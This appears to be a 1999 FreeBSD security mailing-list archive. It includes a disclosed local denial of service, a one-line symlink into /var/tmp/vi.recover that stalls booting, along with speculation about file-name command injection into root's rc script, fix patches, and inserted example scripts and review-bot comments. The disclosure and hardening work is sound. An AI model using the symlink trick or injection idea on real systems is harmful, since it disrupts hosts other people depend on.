From owner-freebsd-security Sun Aug 29 3:35:32 1999
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (law-f153.hotmail.com [209.185.131.216]) by hub.freebsd.org (Postfix) with SMTP id F13C914CE6 for ; Sun, 29 Aug 1999 03:35:22 -0700 (PDT) (envelope-from skalir@hotmail.com)
Received: (qmail 72565 invoked by uid 0); 29 Aug 1999 10:34:06 -0000
Message-ID: <19990829103406.72564.qmail@hotmail.com>
Received: from 166.62.215.109 by www.hotmail.com with HTTP; Sun, 29 Aug 1999 03:34:06 PDT
X-Originating-IP: [166.62.215.109]
From: "skalir scalar"
To: freebsd-questions@freebsd.org, freebsd-security@freebsd.org
Subject: a [Unix Help Network]
Date: Sun, 29 Aug 1999 02:34:06 AKDT
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello people,

I am seriously considering starting up a unix help network in order to try to unite all the different unix and or linux help channels on all irc networks into one big network in order to serve people better and have a much better help system. It will be called "Unix Help Network". If you have any suggestions or comments or anything at all PLEASE reply to this email! Thank you!

I am sending out this email to see how many people would actually like to see such a thing come alive and would be willing to help out or just come on for a good time or to get help! If you are interested please reply to this email and let me know! I am probably going to bring it up within the next 2 weeks as I find a home for its main hub and services. And yes, I am accepting irc operator applications and server links; also looking for web hosting with someone. So if you could please help out or are interested, please let me know!

Sincerely,
Jason L. Schwab
(skalir@hotmail.com)

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


Date: Sun, 29 Aug 1999 15:09:59 +0200
From: Ben Gras
To: dynamo@ime.net
Cc: security@FreeBSD.ORG
Subject: Re: Not sure if you got it...
Message-ID: <19990829150958.A53712@euronet.nl>
In-Reply-To: ; from dynamo@ime.net on Sat, Aug 28, 1999 at 10:22:12PM -0400

All,

On Sat, Aug 28, 1999 at 10:22:12PM -0400, dynamo@ime.net wrote:
> to stop rebooting from working right any user can just do this...
> ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file
> this is my second try -- if you can gimmie an "ok" so i know you got this
> i would appreciate it.

On a related note.. is there any good reason to take the vi.recover business out of the boot process? It seems like a strangely vulnerable place to be processing user-controlled files, using shellscript under root even. And why during the boot? That only happens once every few years anyway (touch wood) ;-).

Sounds like a crontab job to me.

=Ben


Date: Sun, 29 Aug 1999 09:09:30 -0400 (EDT)
From:
To: Ben Gras
Cc: security@FreeBSD.ORG
Subject: Re: Not sure if you got it...
In-Reply-To: <19990829150958.A53712@euronet.nl>

hrm. i just realized i emailed security instead of security-officer. boy do i feel stupid. anyway, you're right.

On Sun, 29 Aug 1999, Ben Gras wrote:
> All,
>
> On Sat, Aug 28, 1999 at 10:22:12PM -0400, dynamo@ime.net wrote:
> > to stop rebooting from working right any user can just do this...
> > ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file
> > this is my second try -- if you can gimmie an "ok" so i know you got this
> > i would appreciate it.
>
> On a related note.. is there any good reason to take the vi.recover business
> out of the boot process? It seems like a strangely vulnerable place to be
> processing user-controlled files, using shellscript under root even. And
> why during the boot? That only happens once every few years anyway (touch
> wood) ;-).
>
> Sounds like a crontab job to me.
>
> =Ben
>

--
- dynamo@ime.net, lumpy_
- vi -c'1,%s/^[^#]/#&/' /etc/inetd.conf; kill -HUP `cat /var/run/inetd.pid`
--


Message-Id: <199908291358.XAA11762@cybernex.net.au>
From: "Jacob Rhoden"
To: security@FreeBSD.ORG
Date: Mon, 30 Aug 1999 00:02:32 +1000
Subject: Daily security run - mail que content
Reply-To: jj@cybernex.net.au

For some reason... I continually get the following message from the crontab security email:

Mail in local queue:
                Mail Queue (1 request)
--Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
CAA94833*                               (no control file)

I have tried a 'find' for a file with a similar name to that to no avail..
How would I remove this message (it's been there for a few weeks)

Regards
Jacob Rhoden
____________________________________________________________
"They said it would never come, They lied..."
System Administrator/Web Developer/Programmer
Jacob Rhoden - jj@cybernex.net.au
jj.dominoid.dhs.org


Message-Id: <199908291414.QAA23161@gratis.grondar.za>
To: jj@cybernex.net.au
Cc: security@FreeBSD.ORG
Subject: Re: Daily security run - mail que content
Date: Sun, 29 Aug 1999 16:13:57 +0200
From: Mark Murray

> CAA94833*                               (no control file)
>
> I have tried a 'find' for a file with a similar name to that to no avail..
> How would I remove this message (it's been there for a few weeks)

# cd /var/spool/mqueue
# rm M

--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org


Message-Id: <3.0.6.32.19990829102105.0086be60@pop3.clark.net>
Date: Sun, 29 Aug 1999 10:21:05 -0400
To: jj@cybernex.net.au, security@FreeBSD.ORG
From: Mark Thomas
Subject: Re: Daily security run - mail que content
In-Reply-To: <199908291358.XAA11762@cybernex.net.au>

At 12:02 AM 8/30/99 +1000, Jacob Rhoden wrote:
>For some reason... I continually get the following message from the
>crontab security email:
>
>
>Mail in local queue:
>                Mail Queue (1 request)
>--Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
>CAA94833*                               (no control file)
>
>I have tried a 'find' for a file with a similar name to that to no avail..
>How would I remove this message (it's been there for a few weeks)

I believe it is the mail message being generated for your security crontab output. By the time you've received the message, it's gone.

Mark
---
thomas@clark.net ---> http://www.clark.net/pub/thomas
PBEM Eldritch --------> http://www.pbegames.com
[TM4463-ORG]


Date: Sun, 29 Aug 1999 16:27:04 +0200
From: Lutz Albers
To: jj@cybernex.net.au, security@FreeBSD.ORG
Subject: Re: Daily security run - mail que content
Message-ID: <3936121061.935944024@ripley.tavari.muc.de>
In-Reply-To: <199908291358.XAA11762@cybernex.net.au>

--On Monday, 30 August 1999, 00:02 +1000 Jacob Rhoden wrote:
> For some reason... I continually get the following message from the
> crontab security email:
>
>
> Mail in local queue:
>                 Mail Queue (1 request)
> --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
> CAA94833*                               (no control file)
>
> I have tried a 'find' for a file with a similar name to that to no
> avail.. How would I remove this message (it's been there for a few weeks)

And you will get it all the time ;-) This is just a part of the security mail which is about to be created by the /etc/security script. You can safely ignore the message.

ciao
lutz
--
Lutz Albers, lutz@muc.de, pgp key available from
Do not take life too seriously, you will never get out of it alive.

Date: Sun, 29 Aug 1999 17:43:02 +0400
From: Alexey Zelkin
To: Jacob Rhoden
Cc: security@FreeBSD.ORG
Subject: Re: Daily security run - mail que content
Message-ID: <19990829174302.A1202@scorpion.crimea.ua>
References: <199908291358.XAA11762@cybernex.net.au>
In-Reply-To: <199908291358.XAA11762@cybernex.net.au>

hi,

On Mon, Aug 30, 1999 at 12:02:32AM +1000, Jacob Rhoden wrote:
> For some reason... I continually get the following message from the
> crontab security email:
>
> Mail in local queue:
>                 Mail Queue (1 request)
> --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
> CAA94833*                               (no control file)
>
> I have tried a 'find' for a file with a similar name to that to no avail..
> How would I remove this message (it's been there for a few weeks)

This is a temporary mail queue file created by a statement in /etc/periodic/daily/450.status-security:

sh /etc/security 2>&1 | sendmail root

If you wanna avoid this message you'll change this statement to smth like:

# stdout goes to the file first, then stderr is joined to it; the other
# order would send stderr to the cron mail instead of the file
sh /etc/security > secure_temp_file.$$ 2>&1
sendmail root < secure_temp_file.$$
rm -f secure_temp_file.$$

Anyway, the first statement is noisy but secure, the second silent but very insecure.
--
Sincerely Yours,          | phantom@crimea.edu (primary)
Alexey Zelkin             | phantom@scorpion.crimea.ua (home)
                          | ICQ: #6196584, FIDO: 2:460/12.26

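A quiet report without the temporary file, as an added example that is not code from the thread or from FreeBSD's periodic scripts: the in-flight message appears in mailq(1) output as a queue ID with "(no control file)", so the section can drop that one entry by its marker and count what remains. The sendmail mailq layout is assumed from the output quoted in the thread; the function names and the sample output are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): report the sendmail queue without the
# entry the daily run itself creates. The pipeline in 450.status-security is
# still executing when mailq runs, so its own message shows up as a queue ID
# marked "(no control file)"; a "*" after the ID marks an entry sendmail has
# locked. Dropping that entry by its marker avoids Alexey's temporary file.

# Read mailq output on stdin; print the waiting entries, each with its
# indented recipient/status lines, minus the header lines and the in-flight
# entry. A second entry with the same marker would be a real queue problem,
# so only the first is assumed to be ours.
pending_queue_report() {
    awk '
        /^[ \t]*Mail Queue|^--Q-ID--|^Total requests/ { next }
        /^[A-Za-z0-9]+\*?[ \t]+\(no control file\)/ && !seen { seen = 1; skip = 1; next }
        /^[A-Za-z0-9]/ { skip = 0 }
        !skip && NF { print }
    '
}

# Number of genuinely waiting entries (lines that begin with a queue ID).
pending_queue_count() {
    pending_queue_report | awk '/^[A-Za-z0-9]/ { n++ } END { print n + 0 }'
}

# Drop-in body for the "Mail in local queue:" section of 440.status-mailq;
# feed it `mailq` on stdin instead of a sample.
mailq_section() {
    report=$(pending_queue_report)
    echo "Mail in local queue:"
    if [ -n "$report" ]; then
        printf '%s\n' "$report"
    else
        echo "  (no mail pending in queue)"
    fi
}

# Constructed mailq output: the self-referential entry alone ...
SAMPLE_SELF_ONLY='                Mail Queue (1 request)
--Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
CAA94833*                               (no control file)'

# ... and alongside a deferred message that really is stuck.
SAMPLE_WITH_STUCK='                Mail Queue (2 requests)
--Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
CAA94833*                               (no control file)
DAA00421      512 Sat Aug 28 04:05 <root@host.example>
                 (Deferred: Connection refused by mx.example.net.)
                                        postmaster@example.net'

printf '%s\n' "$SAMPLE_SELF_ONLY" | mailq_section
printf '%s\n' "$SAMPLE_WITH_STUCK" | mailq_section
```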
From: "Rodney W. Grimes"
Message-Id: <199908291656.JAA62404@gndrsh.dnsmgr.net>
Subject: Re: Not sure if you got it...
In-Reply-To: <19990829150958.A53712@euronet.nl> from Ben Gras at "Aug 29, 1999 03:09:59 pm"
To: ben@euro.net (Ben Gras)
Date: Sun, 29 Aug 1999 09:56:54 -0700 (PDT)
Cc: dynamo@ime.net, security@FreeBSD.ORG

> All,
>
> On Sat, Aug 28, 1999 at 10:22:12PM -0400, dynamo@ime.net wrote:
> > to stop rebooting from working right any user can just do this...
> > ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file
> > this is my second try -- if you can gimmie an "ok" so i know you got this
> > i would appreciate it.

Well, at least 2 of us got it since this is a reply to a reply... :-)

> On a related note.. is there any good reason to take the vi.recover business
> out of the boot process? It seems like a strangely vulnerable place to be
> processing user-controlled files, using shellscript under root even. And
> why during the boot? That only happens once every few years anyway (touch
> wood) ;-).
>
> Sounds like a crontab job to me.

Well, on first impression that may be true, but you have to be very careful about which files you are going to process if you do this, as you might accidentally try to recover an active edit session. Note that some users (me especially) have very long running vi sessions, months on end. So don't try to do it with a -*time option to find.

I am also worried a bit about this line; the echo makes it somewhat safe in that you can't tag a && into the file name and have it execute the command, but if that command is something other than echo it is for sure a real big hole!
virecovery=`echo /var/tmp/vi.recover/recover.*`

And thru examination and a bit of work someone should be able to take advantage of the latter:

recfile=`awk '/^X-vi-recover-path:/{print $2}' < $i`

Building the correct recover.* file name would be hard, as a foreach () is going to split these at spaces. And you need to create a companion file that passes the test ! -r, but I think it could be done. Someone want to go prove it....

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

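One way to vet those files before a privileged script touches them, as an added example that is not code from the thread or from FreeBSD's rc: reject anything under /var/tmp/vi.recover that is not a plain file before reading it, accept the X-vi-recover-path value only if it names a plain, non-empty file directly inside the same directory, and iterate the glob without the intermediate `echo`. The directory and header name are the ones quoted in the thread; the function names and the scratch-directory demo are mine, and the script is POSIX sh.

```shell
#!/bin/sh
# Added example (not code from the thread): vet /var/tmp/vi.recover/recover.*
# notices before a privileged script reads them or trusts the path they name.
# RECOVER_DIR is overridable so the demo at the bottom can use a scratch dir;
# X-vi-recover-path is the header rc extracts, as quoted in the thread.
# The checks still race against a writer in a world-writable directory, so
# they reduce, not remove, the exposure of handling these files as root.
RECOVER_DIR=${RECOVER_DIR:-/var/tmp/vi.recover}

# vi writes recovery notices as plain files. -h runs first because -f and
# -r follow symlinks (a link to a tty is what stalled the boot in the report).
is_plain_file() {
    [ ! -h "$1" ] && [ -f "$1" ] && [ -r "$1" ]
}

# Take only the first X-vi-recover-path header; $2 stops at whitespace, so a
# crafted header cannot hand back a second word or a trailing option.
recover_path_from() {
    awk '/^X-vi-recover-path:/ { print $2; exit }' < "$1"
}

# The file a notice names must be a direct child of RECOVER_DIR: no "..",
# no hidden names, no subdirectory, no trailing slash, not the dir itself.
in_recover_dir() {
    case "$1" in
        "$RECOVER_DIR"/*) ;;
        *) return 1 ;;
    esac
    rest=${1#"$RECOVER_DIR"/}
    case "$rest" in
        ''|*/*|.*) return 1 ;;
    esac
    return 0
}

# Succeeds only when the notice and the backup it points at pass every
# check; each rejection says why, so a scan log shows what was skipped.
vet_recover_notice() {
    notice=$1
    is_plain_file "$notice" || { echo "skip: $notice is not a plain readable file"; return 1; }
    recfile=$(recover_path_from "$notice")
    [ -n "$recfile" ] || { echo "skip: $notice names no recovery file"; return 1; }
    in_recover_dir "$recfile" || { echo "skip: $recfile is outside $RECOVER_DIR"; return 1; }
    is_plain_file "$recfile" || { echo "skip: $recfile is not a plain readable file"; return 1; }
    [ -s "$recfile" ] || { echo "skip: $recfile is empty"; return 1; }
    echo "ok: $notice -> $recfile"
}

# Loop over the glob itself rather than `echo recover.*`, so names containing
# spaces stay whole; an unmatched glob yields the literal pattern, skipped here.
scan_recover_dir() {
    usable=0
    for notice in "$RECOVER_DIR"/recover.*; do
        [ -e "$notice" ] || [ -h "$notice" ] || continue
        if vet_recover_notice "$notice"; then usable=$((usable + 1)); fi
    done
    echo "$usable usable notice(s)"
}

# Constructed scratch directory: a genuine notice, a symlink to a device
# (standing in for the tty in the report), and a notice whose header points
# outside the recover directory.
setup_demo() {
    RECOVER_DIR=$(mktemp -d) || return 1
    printf 'vi.good\n' > "$RECOVER_DIR/vi.good"
    printf 'To: root\nX-vi-recover-path: %s/vi.good\n\nbody\n' "$RECOVER_DIR" \
        > "$RECOVER_DIR/recover.good"
    ln -s /dev/null "$RECOVER_DIR/recover.link"
    printf 'X-vi-recover-path: %s/../elsewhere\n' "$RECOVER_DIR" \
        > "$RECOVER_DIR/recover.escape"
}

setup_demo && scan_recover_dir
```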
From: "Crist J. Clark"
Message-Id: <199908291700.NAA05209@cc942873-a.ewndsr1.nj.home.com>
Subject: daily security run- passwordless accounts
To: freebsd-security@freebsd.org
Date: Sun, 29 Aug 1999 13:00:22 -0400 (EDT)
Reply-To: cjclark@home.com

Since someone brought up small, but somewhat annoying, messages that repeatedly pop up in the default daily security run, I thought I'd add my own little pet peeve and see if anyone else felt the same way.

As it is set up now, the default /etc/security script (for 3.x, not 2.2.x) checks for "passwordless" accounts by a simple awk command. The problem I have is that this setup will flag my NIS entries every time,

+:::::::::

Now this _does_ have an empty password in the local master.passwd file, but that does not mean that the NIS accounts are "passwordless." NIS users still need passwords.

Made a little modification to /etc/security so that NIS entries are passed over. Here is the patch,

% diff -u /etc/security.orig /etc/security
--- /etc/security.orig	Mon Feb 15 05:45:33 1999
+++ /etc/security	Sun Aug 29 12:50:46 1999
@@ -54,7 +54,7 @@
 separator
 echo "checking for passwordless accounts:"
-awk -F: '$2=="" {print $0}' /etc/master.passwd
+awk -F: '/^[^\+-]/ && $2=="" {print $0}' /etc/master.passwd
 
 # show denied packets
 if ipfw -a l 2>/dev/null | egrep "deny|reset|unreach" > $TMP; then

Anyone have strong opinions whether something like that should be made the default or not?

--
Crist J. Clark                           cjclark@home.com

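Review bot: on the `+awk -F: '/^[^\+-]/ && $2=="" {print $0}'` line the exclusion is keyed on the first character of the whole record rather than on the login field, and the `\+` escape is not needed since `+` is literal inside a bracket expression; `$1 !~ /^[+-]/ && $2 == ""` states the intent directly. The exclusion is also unconditional, so a `+:::::::::` line is never reported even on a host where the NIS client is not enabled and the compat entry serves no purpose; gating it on the NIS setting in rc.conf, as the follow-up from Rodney Grimes suggests, keeps the check meaningful in that case.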
From: "Rodney W. Grimes"
Message-Id: <199908291711.KAA62658@gndrsh.dnsmgr.net>
Subject: Re: daily security run- passwordless accounts
In-Reply-To: <199908291700.NAA05209@cc942873-a.ewndsr1.nj.home.com> from "Crist J. Clark" at "Aug 29, 1999 01:00:22 pm"
To: cjclark@home.com
Date: Sun, 29 Aug 1999 10:11:02 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG

> Since someone brought up small, but somewhat annoying, messages that
> repeatedly pop up in the default daily security run, I thought I'd add
> my own little pet peeve and see if anyone else felt the same way.
>
> As it is set up now, the default /etc/security script (for 3.x, not
> 2.2.x) checks for "passwordless" accounts by a simple awk command. The
> problem I have is that this setup will flag my NIS entries every time,
>
> +:::::::::
...
> Anyone have strong opinions whether something like that should be made
> the default or not?

Not the default, but your filter should be turned on if NIS is turned on in /etc/rc.conf* or /etc/defaults/rc.*. The periodic scripts need to be taught much more about the environment they are running in. One way to do this would be to suck in /etc/defaults/rc.conf and use the variables in there to decide just what parts of periodic jobs apply.

I don't really care about rwho hosts; I don't run rwho, and very few people do. Also, 430.status-rwho assumes I am not running rwho if it finds an empty /var/rwho, which may be wrong: I just might not have seen any hosts yet, or some miscreant may be cleaning the directory out. This is only one of many examples that could be fixed if these jobs learned about the control knobs from rc.conf.
--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net


Message-ID: <37C96F14.B14D15CA@criterion-group.com>
Date: Sun, 29 Aug 1999 10:34:13 -0700
From: Roy Bettle
To: skalir scalar
Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: a [Unix Help Network]
References: <19990829103406.72564.qmail@hotmail.com>

Jason;

My company will be upgrading to a 10Mbps ATM segment within the next 3 months (waiting for the fiber to be put into the ground). Once that is complete, we would be happy to host a server and allocate a portion of that bandwidth to this project. As to the fileserver itself, I'm not sure we would be able to donate the box as well, but time will tell.

RAB

skalir scalar wrote:
> Hello people,
>
> I am seriously considering starting up a unix help network in order to try
> to unite all the different unix and or linux help channels on all irc
> networks into one big network in order to serve
> people better and have a much better help system. It will be called
> "Unix Help Network". If you have any suggestions or comments or anything at
> all PLEASE reply to this email! Thank you!
>
> I am sending out this email to see how many people would actually like to
> see such a thing come alive and would be willing to
> help out or just come on for a good time or to get help! If you are
> interested please reply to this email and let me know! I am probably going
> to bring it up within the next 2 weeks as I find a home for its main hub and
> services. And yes, I am accepting irc operator applications and server links;
> also looking for web hosting with someone. So if you could please help out
> or are interested, please let me know!
>
> Sincerely,
> Jason L. Schwab
> (skalir@hotmail.com)
>
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com

Roy Bettle
President, Criterion Group
http://www.criterion-group.com
rbettle@criterion-group.com
(949) 452-1203


Date: Sun, 29 Aug 1999 11:38:22 -0700 (PDT)
From: Greg
To: Jacob Rhoden
Cc: security@FreeBSD.ORG
Subject: Re: Daily security run - mail que content
In-Reply-To: <199908291358.XAA11762@cybernex.net.au>

That is the security cron job that is in progress... You shouldn't find that file, because it is the message you're currently reading...

Greg

On Mon, 30 Aug 1999, Jacob Rhoden wrote:
> For some reason... I continually get the following message from the
> crontab security email:
>
>
> Mail in local queue:
>                 Mail Queue (1 request)
> --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient------------
> CAA94833*                               (no control file)
>
> I have tried a 'find' for a file with a similar name to that to no avail..
> How would I remove this message (it's been there for a few weeks)
>
> Regards
> Jacob Rhoden
> ____________________________________________________________
> "They said it would never come, They lied..."
> System Administrator/Web Developer/Programmer
> Jacob Rhoden - jj@cybernex.net.au
> jj.dominoid.dhs.org
>


In-Reply-To: <199908291358.XAA11762@cybernex.net.au>
References: <199908291358.XAA11762@cybernex.net.au>
Date: Sun, 29 Aug 1999 15:38:53 -0400
To: jj@cybernex.net.au, security@FreeBSD.ORG
From: Garance A Drosihn
Subject: Re: Daily security run - mail que content

At 12:02 AM +1000 8/30/99, Jacob Rhoden wrote:
>For some reason... I continually get the following message
>from the crontab security email:

As others have mentioned, if you only get one line in this check, then it is telling you about the message that it (the check itself) is sending. If you only see one line, ignore it.

This also bothered me, so I changed /etc/periodic/440.status-mailq to be:

#!/bin/sh
#
# $Id: 440.status-mailq,v 1.3 1998/04/17 22:53:59 des Exp $
#

if [ -x /usr/bin/mailq -a -d /var/spool/mqueue ] ; then
    echo ""
    echo "Mail in local queue:"
    if [ "`mailq|egrep -v '(1 request.|Sender/Recipient[-]*)$'|wc -l`" -ne 1 ] ; then
        mailq
    else
        echo "  (no mail pending in queue)"
    fi

    # If you run a busy mail server or mail relay, you may prefer
    # a shorter and better formatted message.
    #
    # mailq | perl -ne 'print if /^\s+\S+@/' |
    #     sort | uniq -c | sort -nr | awk '$1 > 1 {print $1, $2}'
fi

---
Garance Alistair Drosehn           =   gad@eclipse.acs.rpi.edu
Senior Systems Programmer          or  drosih@rpi.edu
Rensselaer Polytechnic Institute


Message-Id: <199908292157.PAA89596@harmony.village.org>
To: dynamo@ime.net
Subject: Re: Not sure if you got it...
Cc: security@freebsd.org
In-reply-to: Your message of "Sat, 28 Aug 1999 22:22:12 EDT."
Date: Sun, 29 Aug 1999 15:57:38 -0600
From: Warner Losh

In message dynamo@ime.net writes:
:
: to stop rebooting from working right any user can just do this...
:
: ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file
:
: this is my second try -- if you can gimmie an "ok" so i know you got this
: i would appreciate it.

OK. I got it. I got your message before then headed off for the weekend. I have patches to rc which fix this exploit.

Warner


Message-Id: <199908300018.SAA90400@harmony.village.org>
To: dynamo@ime.net
Subject: Re: Not sure if you got it...
Cc: security@freebsd.org
In-reply-to: Your message of "Sat, 28 Aug 1999 22:22:12 EDT."
Date: Sun, 29 Aug 1999 18:18:54 -0600
From: Warner Losh

In message dynamo@ime.net writes:
: this is my second try -- if you can gimmie an "ok" so i know you got this
: i would appreciate it.

Since this has been disclosed before I could put a fix in for rc, I'll post my fixes here. It also increases the paranoia of clearing flags from files, as well as correcting a minor grammar problem in a comment. Sorry to jumble together the patches like this, but the /etc/rc* have been "locked" under review lately until just recently. Look at the test -f addition.

Warner

Index: rc
===================================================================
RCS file: /home/imp/FreeBSD/CVS/src/etc/rc,v
retrieving revision 1.195
diff -u -r1.195 rc
--- rc	1999/08/27 23:23:43	1.195
+++ rc	1999/08/30 00:14:44
@@ -129,8 +129,11 @@
 clean_var() {
 	if [ ! -f /var/run/clean_var ]; then
+		chflags -R 0 /var/run/* > /dev/null 2>&1
 		rm -rf /var/run/*
+		chflags 0 /var/spool/lock/* > /dev/null 2>&1
 		rm -f /var/spool/lock/*
+		chflags -R 0 /var/spool/uucp/.Temp/* > /dev/null 2>&1
 		rm -rf /var/spool/uucp/.Temp/*
 		# Keep a copy of the boot messages around
 		dmesg >/var/run/dmesg.boot
@@ -178,8 +181,8 @@
 mount -a -t nfs
 echo .
 
-# Whack the pty perms back into shape.
-chflags 0 /dev/tty[pqrsPQRS]*
+# Put the pty perms back into shape.
+chflags 0 /dev/tty[pqrsPQRS]* > /dev/null 2>&1
 chmod 666 /dev/tty[pqrsPQRS]*
 chown root:wheel /dev/tty[pqrsPQRS]*
@@ -200,14 +203,17 @@ # prune quickly with one rm, then use find to clean up /tmp/[lq]* # (not needed with mfs /tmp, but doesn't hurt there...) - (cd /tmp && rm -rf [a-km-pr-zA-Z]* && + (cd /tmp && chflags -R 0 [a-km-pr-zA-Z]* && rm -rf [a-km-pr-zA-Z]* && find -d . ! -name . ! -name lost+found ! -name quota.user \ - ! -name quota.group -exec rm -rf -- {} \;) + ! -name quota.group -execdir chflags -R 0 {} \; && + find -d . ! -name . ! -name lost+found ! -name quota.user \ + ! -name quota.group -execdir rm -rf -- {} \;) > /dev/null 2>&1 fi # Remove X lock files, since they will prevent you from restarting X11 # after a system crash. +chflags 0 /tmp/.X*-lock /tmp/.X11-unix/* > /dev/null 2>&1 rm -f /tmp/.X*-lock /tmp/.X11-unix/* # snapshot any kernel -c changes back to disk here @@ -348,7 +354,7 @@ echo 'Recovering vi editor sessions' for i in ${vibackup}; do # Only test files that are readable. - if test ! -r ${i}; then + if test ! -r ${i} -o ! -f ${i}; then continue fi @@ -376,6 +382,7 @@ if test -n "${recfile}" -a -s "${recfile}"; then sendmail -t < ${i} else + chflags 0 ${i} > /dev/null 2>&1 rm -f ${i} fi done 
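Review bot: the `chflags -R 0 [a-km-pr-zA-Z]* && rm -rf [a-km-pr-zA-Z]* && find ... && find ...` chain in the /tmp hunk changes the old failure behaviour: `rm -rf` on a name that does not exist succeeds, but when nothing in /tmp matches the glob the unexpanded pattern reaches chflags, chflags fails on the nonexistent name, and the `&&` then skips the rm and both find passes, so /tmp is not cleaned at all (the same happens for any entry whose flags chflags cannot clear). Do not make the rest of the chain conditional on the chflags exit status (`;` rather than `&&`, or `-execdir chflags -R 0 {} \; -execdir rm -rf -- {} \;` in a single find), and note that the `> /dev/null 2>&1` now wrapped around the whole subshell means nobody would see that it stopped short.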
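Review bot: `test ! -f ${i}` in the "Only test files that are readable" hunk follows symbolic links, so a link in /var/tmp/vi.recover that points at a regular file still passes; the reported case, a link to a tty, is rejected only because a tty is not a regular file. Since root goes on to read and then remove `${i}`, reject links explicitly (`test -L ${i}` and continue) or select the candidates with `find /var/tmp/vi.recover -type f` without -L, whose -type is evaluated on the link itself; `${i}` should also be quoted.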
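Review bot: `chflags 0 ${i}` before `rm -f ${i}` runs as root on a name under the user-writable /var/tmp/vi.recover, and because the earlier `! -f` test follows links, `${i}` can still be a user-created symlink to a root-owned regular file; chflags without -R follows the link and changes the flags of the target, so an unprivileged user could have root strip schg from a file of their choosing at boot. The unlink only needs the flags on the directory entry itself: check that `${i}` is not a link before touching it (`test -L`, or an lstat-based selection), and clear only the user flags.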
@@ -400,7 +407,7 @@ fi if [ "${update_motd}" != "NO" ]; then - T=`mktemp /tmp/_motd.XXXXXX` + T=`mktemp /var/run/_motd.XXXXXX` if [ $? -eq 0 ]; then uname -v | sed -e 's,^\([^#]*\) #\(.* [1-2][0-9][0-9][0-9]\).*/\([^\]*\) $,\1 (\3) #\2,' > ${T} awk '{if (NR == 1) {if ($1 == "FreeBSD") {next} else {print "\n"$0}} else {print}}' < /etc/motd >> ${T} To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 17:33:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.on.home.com (ha1.rdc1.on.wave.home.com [24.2.9.66]) by hub.freebsd.org (Postfix) with ESMTP id 2626F14D3F; Sun, 29 Aug 1999 17:33:19 -0700 (PDT) (envelope-from paulg@interlog.com) Received: from interlog.com ([24.65.50.128]) by mail.rdc1.on.home.com (InterMail v4.01.01.07 201-229-111-110) with ESMTP id <19990830003127.CRCF15144.mail.rdc1.on.home.com@interlog.com>; Sun, 29 Aug 1999 17:31:27 -0700 Message-ID: <37C9CF34.EEAAF40E@interlog.com> Date: Sun, 29 Aug 1999 20:24:20 -0400 
From: Paul Griffith X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 i86pc) X-Accept-Language: en MIME-Version: 1.0 To: skalir scalar Cc: freebsd-questions@freebsd.org, freebsd-security@freebsd.org Subject: Re: a [Unix Help Network] References: <19990829103406.72564.qmail@hotmail.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org skalir scalar wrote: > > Hello people, > > I am seriously considering starting up a unix help network in order to try > to unite all the different unix and or linux help channels on all irc > networks into one big network in order to serve > people better and have a much better help system. It will be called > "Unix Help Network". If you have any suggestions or comments or anything at > all PLEASE reply to this email! Thank you! > > I am sending out this email to see how many people would actually like to > see such a thing come alive and would be willing to > help out or just come on for a good time or to get help! If you are > interested please reply to this email and let me know! I am probably going > to bring it up within the next 2 weeks as I find a home for its main hub and > services. and yes I am excepting irc operator applications and server links > also looking for web hosting with someone. so if you could please help out > or are interested, please let me know! > > Sincerely, > Jason L. Schwab > (skalir@hotmail.com) Why not try to help out Unix911.com, seems like you guys are trying to do the same thing. 
-- Paul Griffith paulg@interlog.com | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 19:17:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7AA7715061 for ; Sun, 29 Aug 1999 19:17:47 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA00603; Sun, 29 Aug 1999 20:17:15 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA91030; Sun, 29 Aug 1999 20:19:11 -0600 (MDT) Message-Id: <199908300219.UAA91030@harmony.village.org> To: Bruce Evans Subject: Re: Not sure if you got it... Cc: dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Mon, 30 Aug 1999 12:15:18 +1000." <199908300215.MAA01056@godzilla.zeta.org.au> References: <199908300215.MAA01056@godzilla.zeta.org.au> Date: Sun, 29 Aug 1999 20:19:10 -0600 
